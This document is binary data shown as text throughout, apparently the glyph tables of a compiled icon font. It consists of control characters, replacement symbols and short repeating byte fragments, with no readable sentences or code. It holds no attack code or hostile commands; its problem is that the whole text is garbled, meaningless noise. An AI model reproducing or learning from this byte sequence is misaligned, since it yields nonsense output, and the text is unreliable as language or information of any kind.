�T'09Q_%"264&"&462%+."#."#"&="264&"&4627'&+54&#!"!56'#"&=4;2�**>*+%7H7�6H7/0++<++��F�m�������K�l�+<++<+n�N$//$#0/$N6+<++<+n�
!$Egg�v6?FMU]ejt{������� )2;DV%"#&"&75463732#&%2%6;26=4&#'"%&'7676?6&/767>&/676?6&/76767>&/676?>'67'%373676332?54'&'&/&'#765654&+"#"6732#.'232#>;2#"'"'46;2+"&5623!2+.##"56'4%#5&676?264&"4>"&%264&"462"&%2"'5&75&67�

)	�9
Y�NM��{!
h
<g!R	k g!#/k	*hRy!h	&'*s
��#E4)-

4��<;
��pr����+s
�	p(3-  -  - , ��
�NP	n�j��0,
	!,"&>),<,	+#s+	Z
&	P``
2		.+!
�r6	k\13

-#
3�,,
�(
	*+��s/8AQYcs����7326=46;;2654&+76.'!"'.#"7"&462"&462+"&=46;2%!'!''!7!&46;2+"&5#"+"&=4&+";;26=!;26='326=4&%";264&##";26=4&54&+";26�

�
�

h
��

h
s -2  ,A
�

�
�x����x
�

�
*�

�

�



-
�
.


�|

�




�]



H
!
8

�
�

	


�
�-
Q ,, - ,eb

b
�*-rW

b

��





(
(&

&

	
�
`

`
x`

`
�X&/8AR\my��+."!."#"&=7#32654"&4624&"26%"&4624&"26%!5463!232%737#37371>54.+3733'7#37#737#737#37#737#73'&+";6�'8I8��8J70�
+>,,>+%�,>++>,& ���H��1G
*Z	,	�JM6**4hJM6**47o�0O$00$$00$O�'
��++?+,++>,,���o#|2
|...N|!!|!!kjj�1.?N[j�&'"&/&/#&#+727>'&'"#'&'&76"#"3!7>&67>/%"%>=6&&>7.67&�]�		
7",Yz)Q=

't�n!3ET*K�n+��
�����
��
�9rz
��
#0

.9* 81	-.�	4	1
		n(Y
v�I	
6
	�.	*:0	�WW]r�"'276764'&'&"'&#""'&'&#"'&#""3267;276?2>4.#7"&546733013!"&54672>/632$!D4		0*H
=)& 		$5
#
&'C'6Q	m 	!?%'COD'(C��N+M%6)$3[5$&6..&55�t<	



)9(C'E3(�lANC''COC(t
5�6% 2>$15&(NN
5K6��������"'676?&'&+7'&'&'&/76754'&#"&'&&37'&'&'&/&'&/'6.#"2>=7732767672>4."&46327%#&'67>4'?"&5467;>/632%767676?#
8+*$
"# "A/>5!L�	(G+&A&&AL@&8*#0#=
%.&ALA&&A��(99(0jo9S)Y	MX)9
(99��$Y4			"




/
	V	4'1&ALA&&A&

&a/E*&A&&ALA&��:P: (:�/#6	U +�?9(/[[9Q9s����9���&7>'&'&".>>76?66'&/#767627>'&#&'&'&'#&"+&&'&'6?7&/&'.5&5;56'&7"2>4."&46�5U/E$'=	%#=&76N76�"
%	

8�Q,C	�
&2. >/Z^!5�	8&#
?&
&K�'A'&BNB('B''77N77>4$90G'5"�6N77N7.2%)(	�$W	



0$~F+i
	(	1%3	(�$?PD('BMB'�7N76N7�8"+4=Scox�������!">2!>2>=4&"264&"&462%"264&"&462&+";>2326='#"&=46;2"&=462"264&"&462!!'"&/56767673"%54&#26%3264&+";264&+"���	#+"H","	A)�%)�"!*!27�O
	,+u)�����Q�MKK�KK

*(VV*(V'
�rHHu
*)V���e


%
w�0����	��h�������&'&'.#&+"736+"/&6;2=4&+"'#"'&'&767674>32276?6>'&'&'.'&676+";276?62+"&7&'&6;2&&676?6'&'&636&65'4?6'&'&732=4/&>7676.'&/"76&'&'&'&	
� U4	
-'cAA4
�H<1C0GH3
#(��6 #60)8TS�$#l�$�O(�: #G��F�Df
	!@�83		,T�
=	$H

1`<IcH

'
8-0Q$52E#(�(1"(5) +"CG&L(O'NA7&! Ez<U�.	��/cl@�A >
	��W)IWe!767676732767&=46&/7672376#&"&'&'&76?>372>."!#'"&'&'-(��6W��Z-��"D2
-?��!C!%)
	vx	
 	"D,%;11=	'
fd�-.KuA�k3�L

��"EN(#
�
s
��sw		]M\S(N1�G)4TT9��&���S\��%'&/&'&67''&'&'&76?676767676767676'.'&?6?"64&67676.&767>?&'7676/&'7676�
a
&
N)*;BHS$
= 
;y,#
>.
	6�('2*'��#

		E?.N6KN,N'
na
	
			Z+
R=B+?
�j"
< 
5(	
	\
�'4')3'�h"	4�-
�KQCE���/8]"#;73756767676767"&46245476767&/327676?'&'#�+)3-E3L��I|	'
."m�C/)�++<++��	*"+ !3L�n!
*	
(
�I��B.J-3),��*=**<+�		 +"*	��t	&V%23&'"#"3'&'.#6'6"&'&74&#1&#'&'&/36!27676?#"<~�,
�	8���EtC`�
/N'&/!�w
T��9��

M����
I
�		�;�+#	4���-Hp���%767676'467636'&'&"#&'&'&'&6767>'&/&2?676%"#'&37676767673437676&763>&'&&767632%&767632%��5/#	&%
0	';d<'
'Y
$7RNL��k ?E#RDPJ	
=/;R_XM
Da��*
en�g>80+"
*:H_H
$,1:=6+%
!.:L#'.s;	
R&|��gpyJ@:JD	��Е"S!"

&	X?Jxn&	��	
x
,	
		_


���� %8%&'&'&'.76=7%'&;$?676767:r�
2�j�
��s!�h
�/�B:
�E �
	&
*
���
Q
+�o��*	�Sgptx!!"264&"&462+'&'&'&'&'&'&76?35'&#"&76763'&'&54732654'32'&'&/"&46273#'3��%��$33H43%K		3!
1+/)K;)!"%IC�

>4I3."0 ���$2�3J33J3~  %
" 

&)09):2b
	%33%,&��  �/G/��z����.#&/&'767676?26=4>54'.56'4&"/&'&'&'./&'.#"'&#&"767676?676762'./&6&7673676+"'&"'"'&7>7676763272&'&'&/&'&'.#"#767676767665&76&��
D		
	
8- $#B!7)DY	
)  `�
		^_
	L:9,+9;,+17'��
		
�+@

�/	
c2		�:>()?;%.!(+-!	/);:**=;)(>=",
	$7
jg	20f
	 
(
	
�
7F,�	 �



	��>)7D4632722"&=#"&'#"&#"754&#'54&+'##"6323\



G

��
G
7
P
7

���bXK(.7E&k�
	�
	�jj�	
	
[[
	t���)	9��vw���%'#.5'&76?6'&'&56'./"&=4&#&"&=4&+"+#'&/&'&767>?6767>=4&2;2+"&=632'&/&'&&'5463&'&/&'.#'&/&'"76767676?>=4&1"*&

h" 	!#	

4<

��
SQ	!�L**��:�'-
*S-	�
	.0	"17":A	
1?	
TP..YW!y3YB'
	
;0''?	
662\	+36-6,4ZJ
 R	��
$#		+158:+�'!3!27676?'3�@��B-�~fv�L.�1y�)k�*$
ka
���
KOX\aen���.'.'&/.+754&+"#"32727656543!27>'54;26=6#53'46363##53'3'73#"&>2'"5767>;;2=272+."72#>".>�!	
1+&�3*1B	%!"
-2�0!@��''N'&&N'('&&�''5&%�0h49$	1=1X+�+�&%6(&3,
'O-(![Z!'�1(�
33 
52 %'
&&Eq�'#'''''(�2(7()8&�OC
�%%8�&8()6'����NV_%"+54767675&#&/&'&'!76767>=367676'6?676&%5732"&>2%6'&'./&76/&#./&/&'"'#&'.'&'"'&#"#'&#"2317636;672767>7676?66?>54676?>'&>56?4'.".4>2'"264&��/i;
��

	]my.
b!
1AA(	<!�.
�*+/.?--��		

	
	
				

				�$=$$=H>$$>#&&4%%�s !8$H/
�	M�		Ey/'$G0$1I3[
H���1/?-.?.�
		

	

	

			
					
�$=H>$$>H=$�%4&&3&	�� $(,7AKT]j6?#&"&54>;54732372#!35#3&'.##"%&'&#!">5."2>&"!>."!'&'&#+"�(	��:2+V��L���n�
j���'�(��);	�W"F,$$
��������o

2
			�(�>))*)�	���*Ha�����~07>7676324?6&+"#"&=46;2;26=46;2654&+"&'&"27676764'&'#"&=4&+"+"&=4&+"+"&=4&+"3!26=4&2?62;2?62;2?6762;2?622=4&#!"&"27654'&'&#"2654/&"2654'7&"2654'&;26=4&+"732?6+"&7676327676767637676'&'&#".'&'&/&'&+"�(&�����uf\"�)

$	
�POY|�~
$
"
$


$
��|
%

$

f
$�&&c
&

%�YXX,


"			!
%	 


$),u�� 	" 7���`�I�
% %

	
 �6��







II















�nn0#	
	-%
		&
	

0��+FN^gp�73276'1&'& 17476767;2?!3764/32654'&'&%62&"+"&=46;2"&462!"&4627#!"&=463!2G2$
"A��A"

$2Z9-/ +16\61*!/,9��2�22!K �
y

z	�""0""F""1"""�q
��o		o
 %�X!/JQQJ/!�$|q\



�"1""1""1""1"�
�	�T 6FR[dt7>2!5!""264&"&462&+";>2326='#"&=46;2"&=462"264&"&462%!2654&#!"a
	)2)	u��`""2"#"�	�(
&0'
;@�]33		�""2"""�%&		��		�F#1##0$e""[���TT�#1##1#e""�	"		��	
�k%.L[k{�%"264&"&462'#";6%"26."&4627#54/.+"#3>2326=4&'#"&=46;2!"&=463!2%#"&=46;23#"&=46;2B --@--  S��� --@-,  �K,u
��9N8d��^<��O

���

���

�
�-@--@-s  s&%-@--@-s  s�o��$%22%&�UU�
o
o
�
p
o

p

p
���n��������������"#54&+5!#"#"3>=4&'#53;26=!;2656'5767>'&/>=4&'3#;>56'4%3>33636323>723623#54&#!##>3!2!5'3#".>7+"=4;27"'474;!!'#"&'!7!5!7"+532"&4>7"+"=4;2�2�q5
	
-

	6
	


V}
W

	6	

-
� k	(	

*k�0X�4
0
��m
,CB��}��V �y��~KK�
C 		A���

@?

�
��*




0
^,
~>>�


R��,�
����u&	�O'��n
7ܤr��n	%	&	�#3m|�"264&"&462%"264&"&462'!"3!26=4&74'&'&#!#&#;67676!26767676;56#"&7>32%#4?67>32�%%6%&L&&4&&d�R��
���
"!-*#9"0� 36��		
>�

C*&5%%5&dd&5%%5&d� %!	' +!% AH2	h	�#3m~����"264&"&462%"264&"&462'!"3!26=4&74'&'&#!#&#;67676!26767676;56"+"&7>32%#4?67>372+'546;2+"&=&;72"#"&=6'46;6�%%6%&L&&4&&d�R��
���
"!-*#:"0�!26��

	>�

"!���{	S
$
E*&5%%6%dd&5%%6%d� %!	' +!% AH2	h	C	AB	CK@��)-15;@E7#'!/#76'#&&!767676%#'373#'3"#73"'7373&��;��ZHH	%XY	!#!�!')��.R�	8H/--%
$
!U.5BE
*Y		',/// ��S $)-159=AEQpx���������%#354>3##535#533#3#3#%3'3##5335#3#35#3#!5#5##533530+.'.54747671627#5#733#3#3#53#533'&""1327654'&!!7'7/7'7/7'7/7'7/7'7//v98888888�qq9999rU99988��qq99,pp::����;""_


(4:117-�
	����B4+*"//"�$#(( $$((�A$$((?$$((~��!!:�9��9M9��u9M9��p9�9��9��9�||f&&R:



"CCRRRB2
g2�/!++!�($$(($$�($$(($$���
,6{�'.67'.>7>%62"/&4:'&5'&'&/&'&'.?67&'&/&'&7632547463#"'&767"/&462�<;,3��<;,2�	�
��	9N
�0E
 
/<'N	_
�	�.;<�2.<;2)�	�
�W6�
2<		
k�
�
���(8HW{��6?>'&'&'&&'&76737676672/.767>'&'&.+">'&'##&"6767636327676&%;66'&6?6?>.727%645&74+"363252�*6(+<$
	
*
++*N']	
'b1C[RV<)
#
=l>.)P6lK
.:4DS�K;T,�#-UL�K

�U	2H'
�HR2'
1
%(*(R8$96>B,	O� L# 8�n"		
Md	
<%M�l�
2�c�J		M���Yi{%'&"#"#>32>24'&'&'54&">2>32#";2?!2>/326=4&'764.#".">767#53�
7�	
t(32>20/QRbbRQ/02>23)�I8
7:8C}�E0,"�04[ABK& 
�3{�
7
	a4"!!bUR23 		 32RUb!!"��@@:8
}�
$.7C

Gr!##+#*��J���%Mq��9a%"#"'.6<&"7>'5&6&15&6&#"'&75&6&+"7>765%15&6&"'&6'54&7>'&7>=&76&"'&56'56&#"7&'&'&7676&/&'&'&'&337>767627676765476&'&'.=47676'&7676&#""&7>7654'&/&'47>7676&'&'&'5476767676746K+-		'5�-*
7>�E	-,
>B�'.<�	$6 . 	PM(;H

7\;I	
aEY<��xT;
	C/1
�	=F!

7?N2	'<3

	2	�




	

	

(	

	
�	

%



	:�', '+	
/",L!!A12C!
�\"�F#�EkB;
Xfww2?Kk;0K;	
'-;.&<9E0�6rQ,$NJ

MHY:

R���Wn�&/&+"&=4&#&"+";2+";2;2=46;26=4&+"&75&6;2?642#!"'&'&4?67633%#!"&=463!2�5:�rp��	
.^�3!qq��
��	�f6&D��&	�i
�N9',
01�i#F�!��(i�t	(	�s
:�v��&/&'&'&'&'../&'&227>&/&';>75467675654'?6767677676?676&'.'&'#&'.'&/.>736326/.6326/&'2+#"3736;6726/&'&'&#67>766/&'&/&'&/.'&'&'.&7676>5>?676767>7567?65766?426?4276?67676'276;6&+'676./&'&#""372#"33273.�+]&69!	




	

	"



*
	
	(	


"0		
	$	40>	#
1	
		





	
					
	�l
 6MX+
YZ
,	(#
	.

	
$	&-% 			
,	
:!

	
.-
	




		%
9		

N!"%	


	<Ma)*#
	6	
�O766?>?6#!"&B:y �

����n

<
�	����
%74&"35!35!7264'&"%"#"3!54&673&'&"3�B�B�>$2%2x�
{��v j�

�7pj�
�"����3$%/Q0
_3R�
�4�-Z���
.b��%273767676?'67&'&'6767&"767&&'&676676'.'6.6.''&'.6767>762767627&&'�

t�"+$,.#

!S*R[,	Pu++
G83-/pY��2�G* 	eA#<�h4JH9=
0

\Y	
	[\
]\
)-�[Ga2K$PJ&I&��SA !5.#7	'Fq
EWFC.%4S@.);Ok.8%!#J5:Q*?F/��#%	110221�
�u��{K�������&'&7.7>&'&'.'&''&'%4&'5&'&'#"'"'&3$6766?>76&'&'#&>;6&'&#"&6?6.&'./&66?676?>'1&'.7"'#":3676756.74&'&;672>&'&.'6326'67646&/��>f50E#,,	9&,?+	
";
��"
dc4�
;!!	3&2.:	9&!1+*8B		

	
			

	
	
	z� *a@);),&)=.$%*5
I8N


>�0%-	,
	

!"#
�

1+	c2	
���s�3<"264&&'&'&'&?6765&'&/&'&'4'&?6676'&'&54'.747676.'&'&'7>'&'#&'&""&/&5676&'&'&766567676&'&76762#"&?#6767676?67'&7676767>&'&76'&>6'476''&/'&76&'&'&7667676276'"264&�	7
>?"6$!
="0		
	
CS$"
i	!
&l#G?
	 
J)N




	

8T

 g��0-)
/ 5O
$!]8,(h2C5
B@/M%
 (Q$6&C'
o
]|86\1J,#
'/M!G
.#.'(

CC	>J01(^
 	 ���Pk�&>'&76?56'.'.7656'&/&'&'&'&'&74767>.676767676&'&767676'&/&'.'&'&7>U3kU$&XB	
A	!	

 	%G1�TlgA
	BX&o	
 	

!	.�%G2es?P1a@ A@VBK\8o9-=>Z�
12+1$3=1<7
	
03eY%
P�2GZ>=-9o8\KBV@A @a1P?s�
	
7=/>		3$1+21
؟
)^`3��|Or{��"#&&'.'&'&#"'&6?676767>/&/&'.?3623264&/&'"67>676?6&264&"&'&'&'26?6&&>&M

	
,$3f	!

'	18	0%!;�+/. /-%55J54^
		,"6�%�Bh
E�!-"&W, �
$
�
. &W
)�$	"B�
6J55J5�G

�Z
��$$���=h�&'&'.'.'&1#67#.'#'7'7'7'7#'&36 ;7'&&672676'.'6&6.''.667&'67&7&sG+$	6'5	
%
 n0:)A,-8.351':'=6������'&8!/.5*=@:A0Tr'(!	#
LgWw
-sbatO
8=28%/FR\C3"67���&)	"
& 9%28"&!�!* 	
(���
A4."2>"&462#".'&4>7627&'&#"32767'C#<F<##<F<#�%%4$$(127ZE(D.0f_#T4GDK6kZM2P+.i7GHE6T"�#<##<F<##<$4$$3%�(E-+mZC(&�.5M-)94p59TP0�%�V,f&&'.'&5537!7676&%#3"'#&/&'&'&7676?676?>76"|I]
kE?�q

 0mH<3e)�k		..		kJ)JlwG#	BNqS		

Z,\	
	

Ok		l��%C^}&'.37;7676&'&"'.#2133676&'&%13676&'&'.&'.3;676&6Y82H

	�#D
1�!N
�
PR$	
	i�45I6
	
>?0�

�


�		���/8AJS\eoy�������%.&'.5723!27>76&>."64&'2>.%264&674&"26.>&'"%>.'7656&"'>.%4'&6%674&'>&"%>.>&"v(_5
"�\7]?
		"4+ZA 8R���W����
PD�����j���'VY<`;


!641h����&
q~
)
Q) 
�����!-=N^kz&'&'&'&?6363>76?5&".'&7>72656456'#4&'#'&7623264&"36'&7%&6?656>&'&'&'"�-+>??;9�*6K_	4aI�l=(@#BC��

'	P��0
/	:
	�@1/*�Eu.>
&K1
.	�-G%-(#0H��
&	
����
 
�	0.	�

	����	5!335#5%"2>4."&462����":"":D;"";"##2$#=���@���";D;"";D;"�#2$$2#��},L7673767>&'&'&7&76?6&'.54?676&'72'#"'.>76767&'&'7&'&'&'676767'&'&/.3#&#"'.767167&'&'&'67&'&'&'672767'&'&'676&''&54?676&'7+"7!73>4&'#'#'.6276767&'&'&'7&'&'&'636767&'6�	

! *&$

=*� ''0?
	
 	�

J	


*) 7gf#
	0

,WB$


#8
		#'-'

(
	N�
		
)
1+!=�
			HP!4.58!$$
%
VW�!C	
&=
KGF
		

	&!!"2.$.Y	
	
*"=

-=%#B<
+

	
'F	���(Be����%&'.723!7676&'&7'&'&727367676'2?63726/&?6&/&'&?6&/&2?6?3>%2?6;>/&?6&/&72?43726/&576&"/&'22?43?26/&576&"/&32?6;6/&576&5'&B	vHA`
)"-Y$A-J?5<</E@p,A1,+�2	
V		��

�
	�	�


	�	CF_F
R&S?�*#=[P2Hb'!K7	($630D/	

�

	 

H

�
	�		

	���-:KYhv���%&'.5723!27676&'.%676.?67>.%6?6.>&'&'&&'&>&'767>.'6'&'.>&'&/.�
�RLl

0'
6<g("$V�uq�M	IlnU2-		)��	
�[)		0(�0(**		�0		%#�{

		�	NP
nP	
],^"#�
FQ6nT&H
zU8
�

�
�
(! Y#5


:;


��g+Ad�����"+&&'.#2173!7676&27>5'&'&7'2?6326/&576&"/&2?626/&576&/&'#2?26/5&376&#'&3215732/574&'&"'2?4326/576&#/&2?326/"4374#'&"3"&462"&462"&462'"&4627"&4625EZ
MGg
	+,.0a'��(?&
!%'#!>

�



\	Rct�$&� h		��D!	IL	hL
X*YO 2>2 /%


	
�

1RS��& sL			��\Lb���� )2%327676'&""7676&.&'.31723!27676&327>7'&'&7'?636/&?6&"/&2?6326/&576&"/&#'22?4326/576&"5'&722?6326/574&'&"'2?325'574&'""&462"&462"&462"&462'"&462]#4^
a!O+	|LDd
		,#6^&��'>$
 %#" =
	�


ZZ��$$� eX



kC$4-	~ 	GIeI	U(VF0<10"


	
�


	��$p+	



m��h,:HSdt����������.&'.30173!7676&3276764'&"7676&676.3767264&#"'676?56.>&'&'&&>&/767>.'65'.6'&/."&462"&462"&462"&462'"&4626"Q-		�NGf	+,00a'�9	
8]

��8a MQ�	/A
�


((>
q@
	�&&�! l]


r				�!	IL	gM

W)Z��9	88 
	H/-&R&K		X

''


s
|

;		--

��& w/	
t				���
KT]fox%3276?64&""7676&&&'.723!27>76&"&462"&462"&462"&462'"&462v20+ s"!xTl
#�]8_?
		"5,_C 9S�~ ,  , �&&|k�

{02, 9#

�Q'XZ=a<

"741k�- &�6�

��e.;LZiw���������&&'.5131723!7676&%676.'&727>."#'6?56.>&/&'&&>&'&/?>.'65'4&6/."&462"&462"&462"&462'"&4627"&4624D[	~MGf
	,%-0a%�g8`
'Q�@�

&'%'o	
A

-&(�! k]


q	

	��C 	IK	gL

V)X�0,6.
J			W&''



s
n
;	-	
	%�{& v
.	

t				
��X>\enw������.J&&'.5131736?>372337676&&76?6&#'"7366?"&462"&462"&462"&462'"&462%"&462327>7'&'&7'2?6326/&?6&"/&#?6326/&576&"/&#'22?4;6/&376&##'&#372?36/&?6#"5'&'2?6;6/576&'"(BW	zKDb
		))*	;;	7&/\&��
	"")#GG��%%=��



�T�'@#
!I#!>	

�


\		\��B 	FHcI	�	8NU(U�
"� AB2dd�%�	n[2<1.%

	
�

	
��f9V_hqz����������&&'.5736?>336337676&&76?6&#"36232"&462"&462"&462"&462'"&462%"&462676.37264&#'6?6?6.>&/&&>&'&'?>.'65'4&376/.4EZ		~NFf	*,+		(R
�9(0`'��
	E+	$	���&&H  ��



�				_��8^LO�-.
A	
�("

"&n	>

�D!	IK	gL

�		: QX)Y��/_�& �	



r		
/,%O'I			P	&'

q
	
k
	;	,+			$���
;Ybkt}��&&'.72376?>3723327676&"&76?6&+"36232#&"&462"&462"&462"&462'"&462%"&462vTl
#�]8_?
		"5,	4
JI�E$C t/�c		T	3,
�+3�� -! . �'&����

	�&Q'XZ=a<

"
�
lbj1k�
%&	�-[D7�!!-  &��

	!���,5>GPYb&&'.723!7>76&"&462"&462"&462"&462'"&462%"&462vTl
#�]8_?
		"5-k;9S��!.!!.!�'&�p�

(Q'XZ=b<


"841k�}!!.!! '�8�

"�|5Xw����7>7&'&767&7?66/?6&/"/&#?66/4?6&/"/&#'2?325'576&#/&#"0?4265'76'#"5'4"1'2?35'?6&#'"5'&"0?325'4?6&+"5'&#"'.&/&/.3!26�)D	*-
&
	
�	PZ=�y:��>Z
"++</�
	�	<	g#�=�	�
;
n�N	�\%6DR`l{�%'.&/&/.3!26.#&'.2?67>726=74&"2>&#&#"3727676.'26/.676/&67676.��p6���
��
**<,!L	 	

g		�		�

�	
I
		%R	
	
���7f

�p
g9)#8*�*	|	h

%+
�
���0=&'&#3'&'?67>'&/&'&767676"2>.�C,<3	VBWhuz�`L?+5;
	b^7\Yfi\d��&D))DND))E�	
B�ciN\ ! T

Oy��N44�(CNE)(CNE)�k9Yq��%&/636&5&>7"&%475676767257'.'&'&'"767676?'.765>767'"./'.">''&67>"#&6?6?'/76767%'%�


��
	

	�
�&?H?#&?J>"�
	�Nl�p	����G5�Zwb�
	�		
�	�
�#<#'@&#=#&@H	.
'T+:T$�af!}G� 0(��u9\���%&'&767&76767?66/&?6&/&/&6&/"/&#?66/47%?66/&?6&#'"/&"#?366/4?6&#'"/&#"?66/4?6&/"/&"?66/4?6&/"/&#f3,~QZ�7&79�WO><^�� !%$v$
$"
��	
�
	��


G\OV�=.}U[XEH=42?7�$	# "
��
!"
%$�
	1	i



��x/Eh����	$2@M.&'.#131723!7676&27>7'&'&7'?6326/&?6&"/&#2?636/5&?6&"/&'22?6326/&?6&"5'&722576;6/76&#"/&#"'22?26/576&##'&2?4325'574#'"&?6567&?656732?64&""7676&%327676'&D#U/
�RJl		0'
=3e(��*C'#&'$E	

�	
`			Xhz�
&
	R
�
CBp<
Xh

�\

}#
LO		lP	
[,]_"4@4!!2&

�
	5		VW��
&
		R

DB<	Y3 


 ���-=N\jw��������.&'.723%37>76&&6?67656%&76?65673276764."7676&%37676&'&6676.727>.""'676?6.>&'&'&&>&'&'767>.'6'4'4&>/.Q%X0 �TMp

 /'
,44J��+-!'&
/
u0-
>l
�M
X=h# 7;2�
"	F

�
A
*4z

	G
�$
OS
	pS	3/-a��-+'&/

-0	<5"

!m30;2 D

`
*
+
~

~

@
		0
)����<Zjy��&&'.5723276?>372337676&"&76?6&#'";667"&767>'63267676."7676&%3637676&'&vTl
#�^8_?
		
!6,	4
JI�%0;t/�c

	**3�LQ��b
0.�#D
32w$"� #Q'XZ=b<


!	�
	m5i1k�
&#�-[D�j�b
.0	"D23;$"����,<KZhw&&'.5723%37>76&&767>'6%&?>'673267676."7676&%3637676&'&vTl
#�^8_?
		
!6,;0;9S�Ab
0."K�#D
32w$"� #�Q'XZ=b<


!841k��b
.0	"K"D23;$"�����.'5732676&/7>.76.'5764&"54&"'&"/.'&32?'&2?326?2?26=264/57327>/2676&/7>%'57��==�XQ
	Q+=:u@@
u:=*Q
QW�<=�	WQ

P*=:u
 
@ A
 u:=+
Q
	
PW��:::9**#C"+
.	/X	�#"Fu@]]@uG!#�	X/	.
*"C#*.
	
/X
�#!Hu
@]]@
uG"#�
X/
	."!!C!!C��}(9%&/&4?67>'.756'4676&/&4?>76.7676&'&/&'&6?67>&'&7676&'&"&/&'&&'.'&/&'&3767676/&767676?676?676?62>76&'&'&676'&/&'&476767>'&'.'7676%".7&>;2s_!;
$/d
 <"	
	

	#



"
a0%;"`



"

	
	
!




�w8 778� 		"	C
%

!		%,++g
	!*(%!!
	"! #	

	"?
		
	
*"		
		a"66""66"
���&4ALTajv���63257'5#'#35"'735&547'&47#'#37'767/#'#7546?'5'67''37?&7"264&%4'&#"34&'&#"327>54&".574767>74?>3277>'.�
	\%766&\�y
\&66(�d]%7;;7%]U�GG5*%*N�)6H8)B�G�M)%*5G\(99Q89		8A) 	,	1S1)A&1�4
+ 4)d]%6;;6%]�
�dd]%6;;'�
\&667%\�GG�M)&)|)j*	�G�4)B_G6*%)M�G�9P99P9BÔz!3,��%+1Q04K+1R�4	
�
;�q 	4�' -		���
)6CQ^kx6257'5#'"'7357/&47#'#37'367/#''373?&%#7'#37'3%735'7'5#'357'3"2>4.�p.C@C.qAq.CAB.p�zq-BGGB-qg�WVA2.3^�W�^3.2AV(HB-qzzq-BH��W�^3-3AW�WWA3-3^�� 66@6  6�zp.CHGB.p�Xzp.BGGB.p�p-CAB.p�VV�^2.2��VA3.3_�V�C-p
%p.BsV@2.2^�V��VV�_3.3^6@6  6@6���,5>GSao|����������	#,8FTamy���&&'.5723%37>76&"&462'"&46%"&462''357'5"'7357/4=#'#37'367'5#'##37357&'7#37'35#7'735#7'57'35#'3'"264&%'757'5"'7357/4=#'#37'367'5#'##37357&7'#37'35#'735#7'5#'757'3'"264&'357'50+7357/415#'#37'343'5#'##3735?'#37'35#'735#7'5#'357'3'#"42vTl
#�]8_?
		
!6,;0;9S�X

�		
	
	4		

		
��


+

%9%~-%
 %
X&


.Q(W[=b<


!841k��f
<
	
 	
		
D		2

d�8
.%I
$0

O%~%
Qn




&��g-Dh����&2@N\jv����������+;GSco{�&&'.#21323%37676&327>5'&'&7#2?43726/&?6&"/&2?6326/&576&'#'&'2?26/5&376&##'&32157326/574&5'&'2?6326/&576#"5'&2?326/"4374#5#'&"3"&462'"&4627"&462''357'5"+7357/&47#'#37'76?'5#'##37357'&7#37'35#7'735#7'57'35'3'"264&''6257'5"#'7357/4=#'#37'3767'5#'##373?&7'#37'35#'75'7'5#'357'3'"264&'357'50+7357'5'"=03#'#37'37'5#'##3735?'#21#37'35#'735#7'5#'357'3'"425EZ
MGg
	,#
(0a'��(?&	!%'#@	


�



\	Rbu��				


	

*	

	
�		
"	

	

	-		f

$
				
G	
�	�D!	IL
gL
X)ZO 2>2 /%


	
l

	2	:;�Q			

	1
		
	


	6
(P

m

-
	&
		;
	(	@		
e	
A



Y&��\+@c����
*7ESan{����������*6BN\ht��.&'.25723!7676&327>7'&'&7'?636/&?6&"/&2?6326/576&"/&#'2?6;6/576&#"5'&72?6326/576&'&3'2?4326/576&'#'&331574326/"4374&"5'&"3&?676547327676'&""7676&%'6257'5"'7357/4=#'#37'367'5'##37?&7'#37'35#'735'7'5#'357'3'"264&5#'357'"+7357/4=#'#37'363/#'##3735?'#37'35#'2735#7'5#'357'3'"&463''357'5357'5#'3735#'#737'5#'#57"51#377#37'35#7'735#7'5#'357'3'"&542,!O+	{LEc
)$&/^&��'>$ F">

�


YQ`qO		
#4^��		
	!


	-
		c

#				E



k

 		
		� 	GIdJ
V)UG 0<0.$


	
i


1	89�B	

n$4-	Y

j

+%		9		&>		b		?d$

		!	^
	>��g-Bd����"0<HTbpy����������%1>JXbo}���������� -9@LXdp|����&&'.55723!27676&27>7'&'&7#2?626/&?6&/&2?4626/&?6&/&'#?6326/574#'&721?325'"5174&5#'&'2?26/"?4#"5'&#022?325'574#5'&#"3'4257'5"+7357/4=#'#37'37'5#'#357'#3?'#37'35#'735#7'5#'357'3'"264&''6257'5"+7357/&47#'#37'367'5#'##37357&7'#37'35#'735#7'5#'357'7'"264&5#'73257'"+7357/4=#'#37'37'5#'##3735?'#37'35#'735#7'5#'#357'3'"3254&7'757'5"+7357/4=#'#37'747'5#'##37357&7'#37'35#'75#7'5#'357'3'#"&5432'357'5"+7357/415#'#37'37'5#'##3735747'#37'35#'5#2735#7#'357'3'"436''357'5357'5#'3735#'#737'5#'#57'#377#37'35#7'735#7'5#'357'3'"&4625EZ
NGf		+$$7a'��(?&
!M$B	

�
	


[		Sbt@
	
	


	

7	

	 �
	
"

			.	
f

$			
	F	

n

!

�

$

	
w
l�D!	IL	gL		X)YO 2>2".&



l

2:;��



1
				
2
		
-
P
		
n	

	-	
%
		;		
%	
?			e
		@

g%


"
�&



#�	



�
	���,;JYft���������� .;EQ]iw�����&&'.723!27>76&&?656732?64'&"7676&%'757'5"'7357/&47#'#37'367'5#'##37357&7'#37'35#'735#7'5#'357'3'"264&5#'4257'"+7357/4=#'#37'3767'5#'##37357&7'#37'35#'735#7'5#'357'3'"3264&''357'5357'5#'3735#'#73257'5#'#57"5#377#37'35#7'3735#7'5#'#357'3'"432vTl
#�]8_?
		"5,_C 9S��4K	"3	dp"%�4*

%9$~

-%
 $
X�							+	

		4Q'XZ=a<

"741k�4		K	�"4
eB&

q�7

.%
I
%0
O%
}%
Q�	

	.					

		
+	v!	
'��b*6GVes�����������!*8GVcp~����������
&&'.5323%37676&%676.327>4&#""'6?6.>&/&'&&>&'&'767>.'6'4'5.6/."&462'"&4627"&462''357'5"+7357/&43#'#37'37'5#'##37357'&7#37'35#7'735#7'57'35'3'"264&''6257'5"#'7357/4=#'#373'367/#'##37357&7'#37'35#'735#7'5#'357'3'"264&'357'5057357/415#'#37'37'5#'##37357'"7'##37'35#'2735#7'5#'#357'3'"'5420DY	|MFe
+"
'0_'�l7_ KP�?	
�

#"

o
@
J
	��



		

+		

	�
		

	#	

	*		
.	
f

%
		
	
H	



�	�C!	HJ	fK
	W)W�.,
&P&I
	V'
	

r

	
k	
	;			$
��S					

	2



	
		
7*	Q

o

.	
	'	
<
		
(		
A
	g
		C


[	
'��\+9FUap~���������'4=KYgs����������.&'.5723!7676&&76765673?>&""7676&6676.3726."#'6?6.&>&'&%>&'&'&?>.'6'4'.376'&'.'757'5"+7357/45'7#'#37'367'5#'##373?&7'#37'35#'737#7'5#'757'3'"264&5#'6257'"+7357/4=#'#37'37/#'##373?'#37'35#'75#7'5#'357'3'#"54>''357'5357'5#'3735#'#73503'5#'#57'#377#37'35#7'735#7'5#'357'3'"&462,!O+	{LEd
		+$&/^&��	
?
(*)

Qa
